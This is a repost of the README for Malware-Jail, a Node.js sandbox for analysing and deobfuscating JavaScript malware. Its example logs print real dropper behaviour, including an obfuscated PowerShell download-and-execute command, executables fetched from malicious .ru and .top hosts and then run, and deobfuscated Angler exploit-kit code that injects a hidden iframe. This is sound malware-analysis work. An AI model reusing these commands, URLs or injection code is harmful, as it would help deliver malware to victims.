Malware-Jail - Tool For Javascript Malware Analysis, Deobfuscation and Payload Extraction
Malware-Jail is a sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. It is written for Node.js.
It runs on any operating system. Developed and tested on Linux, Node.js v6.6.0.
Note: Due to use of some ES6 features, you'll need Node.js >= 6.x.
Malware-Jail is written for Node's 'vm' sandbox. Currently implements WScript (Windows Scripting Host) context env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js .
How To Install Malware-JailYou'll need Node.js and npm installed. Because malware-jail is built on top of minimist, iconv-lite and entities.
Pull from GitHubPull the source with git:
git clone https://github.com/HynekPetrak/malware-jail.git cd malware-jail
Then install all the dependecies (minimist, entities, iconv-lite) with:
npm install
Usage
bash@linux# node jailme.js -h -b list 7 May 20:54:52 - mailware-jail, a malware sandbox ver. 0.19 7 May 20:54:52 - ------------------------ 7 May 20:54:52 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-c ./config.json] \ 7 May 20:54:52 - [-o ofile] [-b id] \ 7 May 20:54:52 - [-s odir] [--down] [malware1 [malware2] .. ] 7 May 20:54:52 - -c config .. use alternative config file, preceed with ./ 7 May 20:54:52 - -e ifile ... js that simulates specific environment 7 May 20:54:52 - -o ofile ... name of the file where sandbox shall be dumped at the end 7 May 20:54:52 - -s odir ... output directory for generated files (malware payload) 7 May 20:54:52 - -b id ... browser type, use -b list for possible values 7 May 20:54:52 - -t msecs ... number of miliseconds before terminating execution, default 1 minute 7 May 20:54:52 - --trace ... print stack trace with every log line 7 May 20:54:52 - --down ... allow downloading malware payloads from remote servers 7 May 20:54:52 - --h404 ... on download return always HTTP/404 7 May 20:54:52 - malware ... js with the malware code 7 May 20:54:52 - If no arguments are specified the default values are taken from config.json 7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]
In the examples folder you may find a deactivated malware file. Run the analysis with:
node jailme.js -c ./config_wscript_only.json --down=y malware/example.js
Internet browser based malware you may test with
node jailme.js -b IE11_W10 malware/example_browser.js
At the end of the analysis the complete sandbox context is dumped into a 'sandbox_dump_after.json' file.
You may want to examine following entries of 'sandbox_dump_after.json':
- eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
- wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.
- wscript_urls - all URLs that the malware intended to GET or POST.
- wscript_objects - WScript or ActiveX objects created.
Sample Output
bash@linux# node jailme.js malware/example.js 11 Jan 00:06:24 - Malware sandbox ver. 0.2 11 Jan 00:06:24 - ------------------------ 11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js 11 Jan 00:06:24 - Malware files: malware/example.js 11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json 11 Jan 00:06:24 - Output directory for generated files: output/ 11 Jan 00:06:24 - ==> Preparing Sandbox environment. 11 Jan 00:06:24 - => Executing: env/eval.js 11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls. 11 Jan 00:06:24 - => Executing: env/wscript.js 11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment. 11 Jan 00:06:24 - ==> Executing malware file(s). 11 Jan 00:06:24 - => Executing: malware/example.js 11 Jan 00:06:24 - ActiveXObject(WScript.Shell) 11 Jan 00:06:24 - Created: WScript.Shell[1] 11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%) 11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP) 11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2] 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601) 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y 11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data 11 Jan 00:06:24 - ActiveXObject(ADODB.Stream) 11 Jan 00:06:24 - Created: ADODB_Stream[3] 11 Jan 00:06:24 - ADODB_Stream[3].Open() 11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes 11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2) 11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer) 11 Jan 00:06:24 - ADODB_Stream[3].Close() 11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file. 11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll 11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - Generated file saved 11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json
In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf
Examples
The malware folder contains real-world malware samples. Most of them downloaded from https://malwr.com.
Example: Analysing Wileen.js
Taking malicious script from malwr.com: Wileen.js
Apparently the malware does not execute if run from within a browser:
Therefore you may want to use an alternate config filem which does not load browser/DOM components:
Interesting use of Powershell:
if (typeof document == "undefined") {
Therefore you may want to use an alternate config filem which does not load browser/DOM components:
node jailme.js --down=y -c ./config_wscript_only.json malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
Interesting use of Powershell:
1 Oct 13:05:34 - => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll) 1 Oct 13:05:34 - Created: WScript.Shell[1] 1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined) 1 Oct 13:05:34 - ==> Cleaning up sandbox. 1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file. 1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json
Example: Analysing ORDER-10455.jsTaking malicious JavaScript from malwr.com: ORDER-10455.js
First run without interaction with remote servers:
node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js
you get something like:
... 29 Sep 23:17:21 - Calling eval() no.: 5 29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP) 29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9] 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false) 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) 29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)' 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status = '200' 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() => 200 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject) 29 Sep 23:17:21 - Scripting.FileSystemObject[10] created. 29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2) 29 Sep 23:17:21 - ActiveXObject(ADODB.Stream) 29 Sep 23:17:21 - Created: ADODB_Stream[11] 29 Sep 23:17:21 - ADODB_Stream[11].Open() 29 Sep 23:17:21 - ADODB_Stream[11].Type = '1' 29 Sep 23:17:21 - ADODB_Stream[11].content = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)' 29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes 29 Sep 23:17:21 - ADODB_Stream[11].size = '10000' 29 Sep 23:17:21 - ADODB_Stream[11].Position = '0' 29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2\w8z05i7y2.exe, 2) 29 Sep 23:17:21 - ADODB_Stream[11].content.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - ADODB_Stream[11].Close() 29 Sep 23:17:21 - ActiveXObject(WScript.Shell) 29 Sep 23:17:21 - Created: WScript.Shell[12] 29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2\w8z05i7y2.exe, undefined, undefined) 29 Sep 23:17:21 - Returning: 'undefined' 29 Sep 23:17:21 - ==> Cleaning up sandbox. 29 Sep 23:17:21 - ==> Script execution finished, dumping sandbox environment to a file. 29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated) 29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe 29 Sep 23:17:21 - Generated file saved 29 Sep 23:17:21 - The sandbox context has been saved to: sandbox_dump_after.json
Seems to be a "standard" behaviour of deobfuscation in order to finally download an exe binary and execute it.
If we want to get the real payload, run it with '--down=y':
If we want to get the real payload, run it with '--down=y':
node jailme.js --down=y malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js > malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out
Example: Analysing Norri.js
Taking malicious JavaScript from malwr.com: Norri.js
Run:
you get:
Run:
node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
you get:
30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
30 Sep 01:02:11 - Strict mode: false
30 Sep 01:02:11 - Calling eval() no.: 1
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[9]
30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)
30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)
30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)
30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk
30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)
30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[12]
30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP)
30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]
30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)
30 Sep 01:02:11 - Created: ADODB_Stream[14]
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15]
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)
30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false'
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200
30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished
30 Sep 01:02:15 - ADODB_Stream[14].type = '1'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Open()
30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes
30 Sep 01:02:15 - ADODB_Stream[14].size = '196608'
30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)
30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Close()
30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)
30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)
30 Sep 01:02:15 - ==> Cleaning up sandbox.
30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file.
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]
30 Sep 01:02:16 - Generated file saved
30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json
Behaviour is obvious from the log. Payload has been extracted into the output/TemporaryFolder_TempFile[15] file.
Example: Analysing Angler EKDownload and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler/angler_full.html.
Strip the non Angler part and save as malware/angler/angler_stripped.html.
Remove <script> tags and convert required <div> tags into:
document._addElementById(id, content);
Run the analysis:
node jailme.js malware/angler/angler.js
Eventually capture the output into angler_output.txt:
node jailme.js malware/angler/angler.js > malware/angler/angler_output.txt
Deobfuscating the final stage:
function() { if (document.body != null && typeof document.body != "undefined") { clearInterval(zfxhYOGvfrlHUNJrZufQnWPtohkYAQEEdV); if (typeof window["v_bcd50d9482665cd4e129a272c76799e6"] == "undefined") { window["v_bcd50d9482665cd4e129a272c76799e6"] = 1; var YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr = (DfPJmMLOnxPanSoeHQuOrDdSoCPJGAaRhYURtgyUD() && CCtJDLZQbieboJvsIyatBMZhUvTpzaQcyCXR()); var YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW = !YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr && !!window.chrome && window.navigator.vendor === "Google Inc."; var rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia = -1; var NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS = "http://beladonna33.ga/052F"; if (hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW() && rfddjrtkllJefuAgPfwCNdpgltcAYetudMCia == 1) { if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) { location.replace(NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS) } else { window.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS; document.location = NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS } } else { if ((YJEsPBctdgLUVvQpXvqYKJmoYsElJUhXr && !YBMlxOjmRXjqriuNuiEQPAJsQuuwPLiQW && !hgvANEpEuWeKcGvvwzyKQIhEoKIHuYnyaOtvVW())) { var blDiNORLBvDHjFRqgxXSMVgnfhriGmw = "<div style=\"position:absolute;left:-2808px;\"><iframe width=\"27px\" src=\"" + NOpYEscCPxFAjNAQevxjqvOuLilysKlWWoayIjJeS + "\" height=\"27px\"></iframe></div>"; var wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL = document.getElementsByTagName("div"); if (wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length == 0) { document.body.innerHTML = document.body.innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw } else { var dl_name = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL.length; var eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc = Math.floor((dl_name / 2)); wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML = wudhWcxLZqnlyHWLSZexIwyPtiJtGDxL[eBYogcDktAguizQshmLzdvYhWtSflHvZqVuqIc].innerHTML + blDiNORLBvDHjFRqgxXSMVgnfhriGmw } } } } OncYaaSjwrEWhyHWevaHtkypMUSZxnIrtIK() } }
Post a Comment